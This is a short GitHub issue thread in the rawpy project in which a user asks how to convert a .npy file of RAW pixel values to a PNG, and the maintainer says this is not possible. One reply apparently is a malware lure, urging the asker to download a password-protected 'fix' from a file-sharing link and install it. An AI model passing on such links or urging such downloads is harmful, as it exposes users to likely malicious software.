letmaik/rawpy #239: Is there any method to convert a .npy file to .png image?

PrinceWang01, 2024-08-27:
The postprocess() method can convert RAW image to RGB image, but now I have a .npy file which contains the pixel values of RAW image.  Of course, the pixel value in this .npy file is different from the original RAW file.

I'd like to get RGB image by using this .npy file. However, I have not found useful methods in rawpy API documentation.

So, is there any way to solve my problem?

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

letmaik, 2024-09-12:
I'm afraid that's not possible. npy is not a raw camera format. If it's not supported by https://www.libraw.org/docs then rawpy can't do it.

closed 2024-09-12 by letmaik